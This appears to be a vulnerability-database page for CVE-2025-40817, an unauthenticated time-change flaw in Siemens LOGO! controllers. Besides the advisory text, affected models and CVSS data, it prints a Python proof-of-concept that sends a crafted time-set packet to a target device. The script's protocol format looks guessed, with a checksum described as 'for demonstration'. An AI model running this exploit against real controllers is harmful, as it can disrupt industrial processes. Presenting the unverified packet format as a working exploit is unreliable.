Security Vulnerability Report
CVE-2025-40817 CVSS 6.5 MEDIUM

Published: 2025-11-11 21:15:38
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to change time of the device, which means the device could behave differently.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

LOGO! 12/24RCE (6ED1052-1MD08-0BA2) - All versions
LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) - All versions
LOGO! 230RCE (6ED1052-1FB08-0BA2) - All versions
LOGO! 230RCEo (6ED1052-2FB08-0BA2) - All versions
LOGO! 24CE (6ED1052-1CC08-0BA2) - All versions
LOGO! 24CEo (6ED1052-2CC08-0BA2) - All versions
LOGO! 24RCE (6ED1052-1HB08-0BA2) - All versions
LOGO! 24RCEo (6ED1052-2HB08-0BA2) - All versions
SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) - All versions
SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) - All versions
SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) - All versions
SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) - All versions
SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) - All versions
SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) - All versions
SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) - All versions
SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) - All versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40817 PoC - Siemens LOGO! Time Manipulation
# This PoC demonstrates time modification attack on vulnerable LOGO! devices
# Author: Security Researcher
# Note: For authorized testing only
import socket
import struct
import sys
from datetime import datetime


def craft_logo_time_packet(year, month, day, hour, minute, second):
    """
    Craft LOGO! time modification packet
    LOGO! devices use proprietary protocol on port 10005/TCP or 10006/TCP
    """
    # LOGO! protocol header
    protocol_header = b'\x00\x00\x00\x00'
    # Command type: Time set (0x01)
    cmd_time_set = b'\x01'
    # Reserved bytes
    reserved = b'\x00\x00'
    # Time data structure
    time_data = struct.pack('>H', year)  # Year (big-endian)
    time_data += struct.pack('>B', month)  # Month
    time_data += struct.pack('>B', day)  # Day
    time_data += struct.pack('>B', hour)  # Hour
    time_data += struct.pack('>B', minute)  # Minute
    time_data += struct.pack('>B', second)  # Second
    # Calculate checksum (simple XOR for demonstration)
    checksum = 0
    for byte in cmd_time_set + reserved + time_data:
        checksum ^= byte
    # Construct full packet
    packet = protocol_header + cmd_time_set + reserved + time_data + bytes([checksum])
    return packet


def exploit_logo_time(target_ip, target_port=10005):
    """
    Send malicious time packet to LOGO! device
    """
    try:
        # Set target time (example: 2025-01-01 00:00:00)
        target_time = datetime(2025, 1, 1, 0, 0, 0)
        # Craft malicious packet
        packet = craft_logo_time_packet(
            target_time.year, target_time.month, target_time.day,
            target_time.hour, target_time.minute, target_time.second
        )
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Crafted time packet for: {target_time.isoformat()}")
        print(f"[*] Packet hex: {packet.hex()}")
        # Send packet
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(packet)
        # Receive response
        response = sock.recv(1024)
        print(f"[+] Response received: {response.hex()}")
        sock.close()
        return True
    except socket.timeout:
        print("[-] Connection timeout - device may not be vulnerable or not reachable")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-40817_poc.py <target_ip> [port]")
        sys.exit(1)
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 10005
    print("=" * 60)
    print("CVE-2025-40817 - Siemens LOGO! Time Manipulation PoC")
    print("=" * 60)
    exploit_logo_time(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40817", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:38.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA2) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA2) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA2) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA2) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA2) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA2) (All versions). Affected devices do not conduct certain validations when interacting with them. 
This could allow an unauthenticated remote attacker to change time of the device, which means the device could behave differently."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", 
"userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-267056.html", "source": "[email protected]"}]}}